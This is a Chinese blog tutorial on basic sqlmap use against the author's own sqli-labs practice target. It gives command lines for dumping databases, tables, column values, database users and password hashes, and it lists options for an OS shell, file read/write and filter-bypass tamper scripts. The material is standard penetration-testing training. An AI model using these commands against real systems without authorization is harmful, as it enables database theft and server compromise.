sqlmap 基本使用

原文

遇到SQL注入就sqlmap一把梭,有一说一,这个工具确实好用,不过还是要了解SQL注入原理,不然只能做个脚本小子,简单了解一下 https://www.cnblogs.com/Lee-404/p/12795193.html

sqlmap使用

介绍之前,先简单了解一下sqlmap的参数,可以利用 sqlmap -h 查询,这里简单介绍几个常用的

-u URL
-r 文件
–dbs 获取库名
-D 库名
–tables 获取表名
-T 表名
–columns 获取字段名
-C 字段名
–dump 获取字段值
–users 获取数据库用户
–passwords 获取数据库用户密码
–current-db 获取当前数据库
–current-user 获取当前数据库用户
–batch 跳过确认

直接注入
  1. 首先判断是否存在注入


发现id参数可控,可能有SQL注入,唆哈

sqlmap -u http://192.168.43.167/sql/Less-1/?id=1 --batch

  1. 查询数据库

sqlmap -u http://192.168.43.167/sql/Less-1/?id=1 --dbs --batch

其实到这一步,查哪个库已经无所谓了,因为整个数据库的内容全暴露了,可以为所欲为。一般渗透测试中到这一步就可以了,再下去要出事,不过这是我自己的靶机无所谓

  1. 查询指定数据库的表

sqlmap -u http://192.168.43.167/sql/Less-1/?id=1 -D dvwa --tables --batch

  1. 查询指定表的字段值

sqlmap -u http://192.168.43.167/sql/Less-1/?id=1 -D dvwa -T flag --columns --batch

  1. 查询值

sqlmap -u http://192.168.43.167/sql/Less-1/?id=1 -D dvwa -T flag -C flag --dump --batch

文本注入

从文本中保存一个HTTP请求,sqlmap会加载这个文件获取请求,通常在POST提交表单使用,这个要配合抓包软件使用,如一个文件保存着:

GET /sql/Less-1/?id=1 HTTP/1.1
Host: 192.168.43.167
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

sqlmap -r test.txt --batch

接下来就和直接用URL注入没区别了

其他

sqlmap -u http://192.168.43.167/sql/Less-1/?id=1 --users --batch

sqlmap -u http://192.168.43.167/sql/Less-1/?id=1 --passwords --batch

sqlmap -u http://192.168.43.167/sql/Less-1/?id=1 --current-db --batch

sqlmap -u http://192.168.43.167/sql/Less-1/?id=1 --current-user --batch

参数

–level 探测等级
–is-db 当前用户是否是管理员
–roles 列处数据库管理角色
–referer HTTP referer头
–sql-shell 自定义SQL语句
–os-cmd,–os-shell 任意操作系统命令
–file-read 从服务器中读取文件
–file-write 上传文件到服务器
–tamper 加载绕过脚本

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLMap是一种常见的SQL注入工具,用于发现和利用Web应用程序中的SQL注入漏洞。它可以自动检测和利用各种类型的SQL注入漏洞,并提供了丰富的选项和功能来帮助进行渗透测试。 基本使用方法如下: 1. 安装SQLMap:你可以从官方网站下载SQLMap的最新版本,并按照官方文档中提供的说明进行安装。 2. 目标URL:使用`-u`参数指定目标URL。例如,`sqlmap.py -u http://example.com/page?id=1`。 3. 请求方法:使用`--method`参数指定请求方法,例如GET、POST或DELETE。例如,`sqlmap.py --method=GET -u http://example.com/page?id=1`。 4. 数据参数:如果目标URL是通过POST方法发送数据的,你可以使用`--data`参数指定数据参数。例如,`sqlmap.py --data="username=admin&password=123456" -u http://example.com/login`。 5. 数据库和表:你可以使用`-D`参数指定数据库名称,`--tables`参数列出数据库中的表。例如,`sqlmap.py -D dbname --tables -u http://example.com/page?id=1`。 6. 自动检测:SQLMap可以自动检测目标URL中是否存在SQL注入漏洞。你可以使用`--dbs`参数列出所有可用的数据库。例如,`sqlmap.py --dbs -u http://example.com/page?id=1`。 7. 进一步利用:一旦发现了SQL注入漏洞,你可以使用SQLMap的其他选项和功能来进一步利用漏洞,例如获取数据库中的数据、提取敏感信息等。你可以查阅SQLMap的官方文档了解更多详细的用法。 请注意,在进行任何渗透测试活动之前,确保已获得合法授权,并且仅在合法和合规的环境中使用SQLMap工具。 引用,,<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [网络安全原理与应用:SQL工具注入.pptx](https://download.csdn.net/download/u011062044/85388971)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [sqlmap基本使用方法](https://blog.csdn.net/jayjaydream/article/details/108555660)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值